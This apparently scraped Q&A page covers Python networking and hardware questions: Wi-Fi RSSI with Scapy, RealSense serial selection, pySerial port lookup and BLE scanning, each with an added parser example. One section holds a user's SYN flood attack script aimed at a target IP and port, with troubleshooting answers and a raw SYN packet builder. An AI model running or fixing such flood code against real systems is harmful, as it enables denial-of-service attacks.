RSSI information with Scapy - python

When I try to get RSSI information from the wireless networks around me with Scapy, I'm getting some errors. Also, I am using an ALFA-036NH, my monitor mode is enabled and the OS is Kali Linux. I used the code below:

from scapy.all import *
from datetime import datetime
import os
import signal
import sys

def PacketHandler(pkt):
    if pkt.haslayer(Dot11):
        if pkt.type == 0 and pkt.subtype == 8:
            if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
                try:
                    extra = pkt.notdecoded
                    rssi = -(256 - ord(extra[-4:-3]))
                except:
                    rssi = -100
                print "WiFi signal strength:", rssi

sniff(iface="wlan0mon", prn=PacketHandler)

However, all of the networks give -100 dBm. Thanks for your interest.

Please retry using the latest Scapy GitHub version (or 2.4.1+). It has improved support for RSSI, which is now available (if present) via the dBm_AntSignal field:

pkt.dBm_AntSignal

You don't need the function you provided.
PS: where did you find such code? Did you do it yourself? Thanks
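Added example (not code from the question or the answer): the bytes the question's code was poking at are the radiotap header that monitor-mode drivers prepend to each 802.11 frame, which is what Scapy parses into RadioTap/dBm_AntSignal. The parser below walks the radiotap "present" bitmask with the spec's per-field sizes and alignments, pulls the dBm antenna signal out by field number, and decodes BSSID and SSID from the beacon behind it. The two header layouts and the beacon are constructed samples; they show why the fixed "4 bytes before the end" guess only works for some drivers.

```python
import struct

# Radiotap field bit -> (size, alignment) from the radiotap spec; common fields only.
RADIOTAP_FIELDS = {
    0: (8, 8), 1: (1, 1), 2: (1, 1), 3: (4, 2), 4: (2, 2),       # TSFT, Flags, Rate, Channel, FHSS
    5: (1, 1), 6: (1, 1), 7: (2, 2), 8: (2, 2), 9: (2, 2),       # dBm signal, dBm noise, lock, TX att, dB TX att
    10: (1, 1), 11: (1, 1), 12: (1, 1), 13: (1, 1), 14: (2, 2),  # dBm TX pwr, antenna, dB signal, dB noise, RX flags
    15: (2, 2), 16: (1, 1), 17: (1, 1), 18: (8, 4), 19: (3, 1),  # TX flags, RTS retries, data retries, XChannel, MCS
    20: (8, 4), 21: (12, 2), 22: (12, 8),                        # A-MPDU, VHT, timestamp
}
DBM_ANTSIGNAL = 5  # bit 5: signed int8, dBm (Scapy's dBm_AntSignal)

def parse_radiotap(buf):
    """Return (fields, header_len); fields maps radiotap bit -> raw field bytes."""
    version, _pad, length, present = struct.unpack_from("<BBHI", buf, 0)
    if version != 0 or length < 8 or length > len(buf):
        raise ValueError("bad radiotap header")
    offset, word = 8, present
    # Bit 31 means another present word follows; skip them so data offsets stay right
    # (extended/vendor namespaces are not decoded here).
    while word & (1 << 31):
        (word,) = struct.unpack_from("<I", buf, offset)
        offset += 4
    fields = {}
    for bit in range(29):  # bits 29-31 are namespace markers, not data fields
        if not present & (1 << bit):
            continue
        if bit not in RADIOTAP_FIELDS:
            break  # unknown size: nothing after it can be located reliably
        size, align = RADIOTAP_FIELDS[bit]
        offset = (offset + align - 1) & ~(align - 1)  # fields are naturally aligned
        fields[bit] = buf[offset:offset + size]
        offset += size
    return fields, length

def rssi_dbm(fields):
    """RSSI in dBm, or None when the driver did not include the field."""
    if DBM_ANTSIGNAL not in fields:
        return None
    return struct.unpack("<b", fields[DBM_ANTSIGNAL])[0]

def legacy_hack(buf):
    """The question's guess: assumes the RSSI byte sits 4 bytes before the end of the header."""
    _fields, length = parse_radiotap(buf)
    return -(256 - buf[length - 4])

def parse_beacon(buf):
    """(bssid, ssid, rssi) for a radiotap-encapsulated beacon frame, else None."""
    fields, hdr_len = parse_radiotap(buf)
    frame = buf[hdr_len:]
    if len(frame) < 36:
        return None
    fc0 = frame[0]
    if (fc0 >> 2) & 0x3 != 0 or fc0 >> 4 != 8:  # type 0 (management), subtype 8 (beacon)
        return None
    bssid = ":".join("%02x" % b for b in frame[10:16])  # addr2, the question's pkt.addr2
    tags, ssid = frame[36:], None  # tagged params follow timestamp(8), interval(2), capabilities(2)
    while len(tags) >= 2:
        tag_id, tag_len = tags[0], tags[1]
        if tag_id == 0:
            ssid = tags[2:2 + tag_len].decode("utf-8", "replace")
            break
        tags = tags[2 + tag_len:]
    return bssid, ssid, rssi_dbm(fields)

# Constructed samples: the same beacon behind two different radiotap headers.
HDR_A = (struct.pack("<BBHI", 0, 0, 26, 0x0000482F)  # TSFT|Flags|Rate|Channel|dBm sig|Antenna|RX flags
         + struct.pack("<Q", 0x12345678) + bytes([0x00, 0x02])
         + struct.pack("<HH", 2437, 0x00A0) + struct.pack("<b", -42) + bytes([1]) + struct.pack("<H", 0))
HDR_B = (struct.pack("<BBHI", 0, 0, 17, 0x0000086E)  # Flags|Rate|Channel|dBm sig|dBm noise|Antenna
         + bytes([0x00, 0x0C]) + struct.pack("<HH", 5180, 0x0140)
         + struct.pack("<b", -67) + struct.pack("<b", -95) + bytes([0]))
BEACON = (bytes([0x80, 0x00, 0x00, 0x00]) + b"\xff" * 6 + bytes.fromhex("aabbccddeeff") * 2 + b"\x00\x00"
          + struct.pack("<QHH", 0, 100, 0x0431) + bytes([0, 4]) + b"test" + bytes([1, 1, 0x82]))

if __name__ == "__main__":
    for hdr in (HDR_A, HDR_B):
        print(parse_beacon(hdr + BEACON), "legacy guess:", legacy_hack(hdr + BEACON))
```

With HDR_A (a TSFT/Flags/Rate/Channel/signal/antenna/RX-flags layout) the signal byte happens to be 4 bytes before the end, so the guess returns -42; with HDR_B it lands on a channel-flags byte and returns -255. Reading the field by its present bit, as Scapy does, gives the right answer for both.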

Related

Pyrealsense2 (Librealsense SDK 2.0): choose cam from Serial Number

I have 2 Intel RealSense D415 cameras. I'm using a NUC with Xubuntu 16.04 and Python 3.5.2.
I can find only this documentation and examples: https://github.com/IntelRealSense/librealsense/tree/master/wrappers/python
My problem is that I need to select the camera to use by serial number, to be sure to select the same camera every time.

import pyrealsense2 as rs

pipeline = rs.pipeline()
config = rs.config()
profile = config.resolve(pipeline)
print(profile.get_device())

This code prints this: < pyrealsense2.device: Intel RealSense D415 (S/N: 805212060066) >
I need to check the S/N and, in case it's not the right one, I would need to pass to the second camera, then the third...
I would need a guide or documentation about pyrealsense2, but I don't think it exists.
EDIT - I found a solution:
import pyrealsense2 as rs

ctx = rs.context()
if len(ctx.devices) > 0:
    for d in ctx.devices:
        print('Found device: ',
              d.get_info(rs.camera_info.name), ' ',
              d.get_info(rs.camera_info.serial_number))
else:
    print("No Intel Device connected")

You can specify the device serial number in config.

import pyrealsense2 as rs

pipeline = rs.pipeline()
config = rs.config()  # the module alias is rs (the original had a typo, re.config())
config.enable_device('805212060066')
profile = config.resolve(pipeline)

python error on synflood attack

I am writing code for a SYN flood attack, but when I run the file via Python I get errors.
SYNFlood.py file:

import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

target_ip = sys.argv[1]         # the ip of the victim machine
target_port = int(sys.argv[2])  # the port of the victim machine (a TCP port is an int, not a string)
print("ip " + target_ip + " port " + str(target_port))
# dst must be the variable, not the literal string "target_ip"
send(IP(src="192.168.x.x", dst=target_ip) / TCP(sport=135, dport=target_port), count=2000)
But when I am running the file with:
python SYNFlood.py target_ip target_port
I get the following error:
I have tried to alter the code as follows:

while True:
    p = IP(dst=target_ip, id=1111, ttl=99) / TCP(sport=RandShort(), dport=int(target_port),
                                                 seq=12345, ack=1000, window=1000, flags="S")
    send(p, count=10)

But even if on cmd I get
when I run the command netstat -A on the target PC, I don't see SYN_RECV packets.
I have tried with
send(p, verbose=0, count=10)
but I don't have any output on either the dst PC or the src PC with the respective commands.

Try reinstalling Scapy or scapy3k. This sounds like a build issue. Confirm you are using the correct Scapy version.

I figured out that I had to run the program on the Windows 32-bit version.
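Added example (not from the question or either answer): what Scapy assembles behind IP(...)/TCP(..., flags="S"), built by hand with struct so the bytes of a SYN and the two checksums Scapy fills in are visible. Addresses, ports and sequence numbers below are constructed values; verify_packet re-checks both checksums the way a receiving host does, since a SYN with a bad checksum is dropped silently and never reaches SYN_RECV.

```python
import random
import socket
import struct

def checksum(data):
    """RFC 1071 Internet checksum: one's-complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_syn(src_ip, dst_ip, dport, sport=None, seq=None, ttl=64, ip_id=1111, window=1000):
    """Raw bytes of an IPv4/TCP SYN; equivalent to Scapy's
    IP(src=..., dst=..., id=..., ttl=...)/TCP(sport=..., dport=..., seq=..., window=..., flags='S')."""
    sport = random.randint(1024, 65535) if sport is None else sport  # like Scapy's RandShort()
    seq = random.getrandbits(32) if seq is None else seq
    src, dst = socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
    # TCP header: ports, seq, ack, data offset (5 words), flags=SYN (0x02), window, csum=0, urgent
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x02, window, 0, 0)
    # The TCP checksum covers a pseudo-header (addresses, zero, protocol, TCP length) plus the segment
    pseudo = src + dst + struct.pack("!BBH", 0, socket.IPPROTO_TCP, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    # IPv4 header: version/IHL, TOS, total length, id, flags/fragment, TTL, protocol, csum=0, addresses
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ip_id, 0, ttl,
                     socket.IPPROTO_TCP, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp

def verify_packet(pkt):
    """Re-check both checksums; return (src, dst, sport, dport, flags) or None if corrupt."""
    ihl = (pkt[0] & 0x0F) * 4
    if checksum(pkt[:ihl]) != 0:  # a header with a correct checksum sums to zero
        return None
    tcp = pkt[ihl:]
    pseudo = pkt[12:20] + struct.pack("!BBH", 0, pkt[9], len(tcp))
    if checksum(pseudo + tcp) != 0:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    return socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20]), sport, dport, tcp[13]

if __name__ == "__main__":
    pkt = build_syn("192.168.1.10", "192.168.1.20", 80, sport=40000, seq=12345)
    print(pkt.hex())
    print(verify_packet(pkt))
```

To put such bytes on the wire you still need raw-socket privileges (root, or administrator with a packet driver on Windows); Scapy's send(IP(pkt)) will re-parse and transmit them. Note that dport is packed as a 16-bit integer, which is why a port taken from sys.argv has to be converted with int() before it is handed to TCP().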

Scapy Sniff Segmentation Fault on OSX

I am trying to use Scapy to sniff out wireless access points, but whenever I run the script nothing is printed and I get a Segmentation Fault: 11.
I am using Python 3.4 and am running OS X.
Here is my code (it's fairly common; taken from tutorials on other sites):

import sys
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *

ap_list = []
d = {'counter': 0}

def PacketHandler(pkt):
    if pkt.haslayer(Dot11):
        if pkt.type == 0 and pkt.subtype == 8:
            d['counter'] += 1
            if d['counter'] > 500:
                sys.exit()
            if pkt.addr2 not in ap_list:
                ap_list.append(pkt.addr2)
                print("AP MAC: %s with SSID: %s" % (pkt.addr2, pkt.info))

sniff(iface="en0", prn=PacketHandler)

To sniff, Scapy requires running as sudo.

Finding a specific serial COM port in pySerial (Windows)

I have a script built (Windows 7, Python 2.7) to list the serial ports, but I'm looking for a device with a specific name.
My script:

import serial.tools.list_ports

ports = list(serial.tools.list_ports.comports())
for p in ports:
    print(p)

This returns:

COM3 - Intel(R) Active Management Technology - SOL (COM3)
COM6 - MyCDCDevice (COM6)
COM1 - Communications Port (COM1)
>>>

Great! However, I want this script to automatically pick out MyCDCDevice from the bunch and connect to it.
I tried:

import serial.tools.list_ports

ports = list(serial.tools.list_ports.comports())
for p in ports:
    if 'MyCDCDevice' in p:
        print(p)
        # do connection stuff to COM6

But that doesn't work. I suspect because p isn't exactly a string, but an object of some sort?
Anyway, what's the correct way to go about this?
Thanks!!
I know this post is very old, but I thought I would post my findings since there was no 'accepted' answer (better late than never).
This documentation helped with determining members of the object, and I eventually came to this solution.
import serial.tools.list_ports

ports = list(serial.tools.list_ports.comports())
for p in ports:
    if 'MyCDCDevice' in p.description:
        print(p)
        # Connection to port
        s = serial.Serial(p.device)

To extend on this further, I've found it safer to use the PID and VID of the device in question.

import serial.tools.list_ports

# FTDI FT232 device (http://www.linux-usb.org/usb.ids): vendor ID 0403, product ID 6001
vid = 0x0403
pid = 0x6001
my_comm_port = None
ports = list(serial.tools.list_ports.comports())
for p in ports:
    # ListPortInfo exposes the USB IDs as integers; test both explicitly
    # ('pid and hid in p.hwid' only ever tested the second string)
    if p.vid == vid and p.pid == pid:
        my_comm_port = p.device

Better still, you can use the serial number of the device for the lookup, just in case you have 2 of the same device plugged in.
(Source)
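Added example (not from the question or the answers): a small parser for the hwid strings that pyserial's ListPortInfo.hwid carries for USB ports ("USB VID:PID=0403:6001 SER=A6008isP ..."), plus a selector that matches on VID/PID and, when two identical adapters are plugged in, on the serial number, refusing to guess when the choice is ambiguous. The port list is a constructed sample of (device, hwid) pairs; with pyserial installed you would feed it [(p.device, p.hwid) for p in comports()].

```python
import re

# VID:PID and optional SER= token as pyserial formats them for USB ports;
# non-USB ports carry something else (e.g. "ACPI\PNP0501\1" or "n/a").
_USB_HWID = re.compile(
    r"VID:PID=(?P<vid>[0-9A-Fa-f]{4}):(?P<pid>[0-9A-Fa-f]{4})"
    r"(?:\s+SER=(?P<ser>\S+))?"
)

def parse_hwid(hwid):
    """Return {'vid': int, 'pid': int, 'ser': str or None} for a USB hwid, else None."""
    m = _USB_HWID.search(hwid or "")
    if not m:
        return None
    return {"vid": int(m.group("vid"), 16), "pid": int(m.group("pid"), 16), "ser": m.group("ser")}

def select_port(ports, vid, pid, serial=None):
    """ports: iterable of (device, hwid) pairs.
    Returns the device whose VID/PID match and, if serial is given, whose serial matches exactly.
    Raises LookupError when nothing matches, or when serial is None and several ports match."""
    matches = []
    for device, hwid in ports:
        info = parse_hwid(hwid)
        if info is None or info["vid"] != vid or info["pid"] != pid:
            continue
        if serial is not None and info["ser"] != serial:
            continue
        matches.append(device)
    if not matches:
        raise LookupError("no port with VID:PID=%04X:%04X serial=%s" % (vid, pid, serial))
    if serial is None and len(matches) > 1:
        raise LookupError("ambiguous: %s all match; pass a serial number" % matches)
    return matches[0]

# Constructed sample of (p.device, p.hwid) pairs, including two identical FTDI adapters.
SAMPLE_PORTS = [
    ("COM3", "ACPI\\PNP0501\\1"),
    ("COM6", "USB VID:PID=0403:6001 SER=A6008isP"),
    ("COM7", "USB VID:PID=0403:6001 SER=FT1XYZ LOCATION=1-1.2"),
    ("COM1", "n/a"),
]

if __name__ == "__main__":
    print(select_port(SAMPLE_PORTS, 0x0403, 0x6001, serial="FT1XYZ"))
```

Once select_port returns a device name, serial.Serial(device) opens it as in the answer above; the serial-number match is what keeps a script from silently talking to the wrong one of two identical adapters.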
You can use serial.tools.list_ports.grep, which searches all of the description fields for you. For example:

from serial.tools import list_ports

try:
    cdc = next(list_ports.grep("MyCDCDevice"))
    # Do connection stuff on cdc
except StopIteration:
    print "No device found"

If that doesn't work, you may try adding a * to the end of the string you pass to grep, in case there are extra characters in the descriptor.

Finding Bluetooth low energy with python

Is it possible for this code to be modified to include Bluetooth Low Energy devices as well? https://code.google.com/p/pybluez/source/browse/trunk/examples/advanced/inquiry-with-rssi.py?r=1
I can find devices like my phone and other Bluetooth 4.0 devices, but not any BLE ones. If this cannot be modified, is it possible to run hcitool lescan and pull the data from hcidump within Python? I can use the tools to see the devices I am looking for, and hcidump gives an RSSI, which is what my end goal is: to get a MAC address and RSSI from the BLE device.
Thanks!
As I said in the comment, that library won't work with BLE.
Here's some example code to do a simple BLE scan:

import sys
import os
import errno
import struct
from ctypes import (CDLL, get_errno)
from ctypes.util import find_library
from socket import (
    socket,
    AF_BLUETOOTH,
    SOCK_RAW,
    BTPROTO_HCI,
    SOL_HCI,
    HCI_FILTER,
)

if not os.geteuid() == 0:
    sys.exit("script only works as root")

btlib = find_library("bluetooth")
if not btlib:
    raise Exception(
        "Can't find required bluetooth libraries"
        " (need to install bluez)"
    )
bluez = CDLL(btlib, use_errno=True)

dev_id = bluez.hci_get_route(None)

sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI)
sock.bind((dev_id,))

err = bluez.hci_le_set_scan_parameters(sock.fileno(), 0, 0x10, 0x10, 0, 0, 1000)
if err < 0:
    # occurs when scanning is still enabled from previous call
    raise Exception("Set scan parameters failed")

# allows LE advertising events
hci_filter = struct.pack(
    "<IQH",
    0x00000010,
    0x4000000000000000,
    0
)
sock.setsockopt(SOL_HCI, HCI_FILTER, hci_filter)

err = bluez.hci_le_set_scan_enable(
    sock.fileno(),
    1,     # 1 - turn on; 0 - turn off
    0,     # 0 - filtering disabled, 1 - filter out duplicates
    1000   # timeout
)
if err < 0:
    errnum = get_errno()
    raise Exception("{} {}".format(
        errno.errorcode[errnum],
        os.strerror(errnum)
    ))

while True:
    data = sock.recv(1024)
    # print bluetooth address from LE Advert. packet
    print(':'.join("{0:02x}".format(x) for x in data[12:6:-1]))

I had to piece all of that together by looking at the hcitool and gatttool source code that comes with BlueZ. The code is completely dependent on libbluetooth-dev, so you'll have to make sure you have that installed first.
A better way would be to use D-Bus to make calls to bluetoothd, but I haven't had a chance to research that yet. Also, the D-Bus interface is limited in what you can do with a BLE connection after you make one.
EDIT:
Martin Tramšak pointed out that in Python 2 you need to change the last line to print(':'.join("{0:02x}".format(ord(x)) for x in data[12:6:-1]))
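Added example (not from the question or the answer): the answer's loop prints only the address out of each HCI packet, but the asker's goal was MAC plus RSSI. The parser below decodes the HCI LE Meta / LE Advertising Report event that the answer's HCI_FILTER lets through (packet type 0x04, event 0x3E, subevent 0x02), walking every report in the event to return address, signed RSSI in dBm and the decoded advertising data structures (e.g. the device name, type 0x09). The event bytes are a constructed sample; on a live socket you would pass each sock.recv(1024) result to parse_le_advertising_reports.

```python
import struct

HCI_EVENT_PKT = 0x04
EVT_LE_META_EVENT = 0x3E           # the event the answer's filter mask (bit 62) admits
EVT_LE_ADVERTISING_REPORT = 0x02   # LE Meta subevent code

def parse_ad_structures(data):
    """Split an advertising payload into {ad_type: value} from its length/type/value structures."""
    out, i = {}, 0
    while i < len(data):
        length = data[i]
        if length == 0 or i + 1 + length > len(data):
            break  # padding or malformed: stop rather than read past the buffer
        out[data[i + 1]] = bytes(data[i + 2:i + 1 + length])
        i += 1 + length
    return out

def parse_le_advertising_reports(pkt):
    """Return [(mac, rssi_dbm, ad_structs)] from one raw HCI packet read off the socket;
    [] for anything that is not an LE Advertising Report event."""
    if len(pkt) < 5 or pkt[0] != HCI_EVENT_PKT or pkt[1] != EVT_LE_META_EVENT:
        return []
    plen, subevent, num_reports = pkt[2], pkt[3], pkt[4]
    if subevent != EVT_LE_ADVERTISING_REPORT or len(pkt) < 3 + plen:
        return []
    reports, i = [], 5
    for _ in range(num_reports):
        # report: event type(1), addr type(1), addr(6, little-endian), data len(1), data, rssi(1)
        if i + 9 > len(pkt):
            break
        mac = ":".join("%02x" % b for b in pkt[i + 7:i + 1:-1])  # the answer's data[12:6:-1] when i == 5
        dlen = pkt[i + 8]
        if i + 9 + dlen >= len(pkt):
            break  # truncated report
        adv = pkt[i + 9:i + 9 + dlen]
        rssi = struct.unpack("b", pkt[i + 9 + dlen:i + 10 + dlen])[0]  # signed dBm; 127 means unavailable
        reports.append((mac, rssi, parse_ad_structures(adv)))
        i += 10 + dlen
    return reports

def _report(evt_type, addr_type, mac, adv, rssi):
    """Build one advertising report (helper for the constructed sample only)."""
    addr_le = bytes.fromhex(mac.replace(":", ""))[::-1]
    return bytes([evt_type, addr_type]) + addr_le + bytes([len(adv)]) + adv + struct.pack("b", rssi)

# Constructed sample: one event carrying two reports, a named ADV_IND and a non-connectable beacon.
_r1 = _report(0x00, 0x00, "11:22:33:44:55:66", bytes([2, 0x01, 0x06, 10, 0x09]) + b"SensorTag", -58)
_r2 = _report(0x03, 0x01, "c0:de:ca:fe:be:ef", bytes([5, 0xFF, 0x4C, 0x00, 0x12, 0x34]), -90)
_body = bytes([EVT_LE_ADVERTISING_REPORT, 2]) + _r1 + _r2
SAMPLE_EVENT = bytes([HCI_EVENT_PKT, EVT_LE_META_EVENT, len(_body)]) + _body

if __name__ == "__main__":
    for mac, rssi, ad in parse_le_advertising_reports(SAMPLE_EVENT):
        print(mac, rssi, "dBm", ad.get(0x09, b"").decode("utf-8", "replace"))
```

Replacing the answer's print line with a loop over parse_le_advertising_reports(data) yields the MAC/RSSI pairs directly; scan responses arrive as separate reports (event type 0x04) for the same address, so de-duplicate by MAC if you only want one line per device.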
You could also try pygattlib. It can be used to discover devices, and (currently) there is basic support for reading/writing characteristics. No RSSI for now.
You could discover using the following snippet:

from gattlib import DiscoveryService

service = DiscoveryService("hci0")
devices = service.discover(2)

DiscoveryService accepts the name of the device, and the method discover accepts a timeout (in seconds) to wait for responses. devices is a dictionary with BL addresses as keys and names as values.
pygattlib is packaged for Debian (and Ubuntu), and is also available as a pip package.
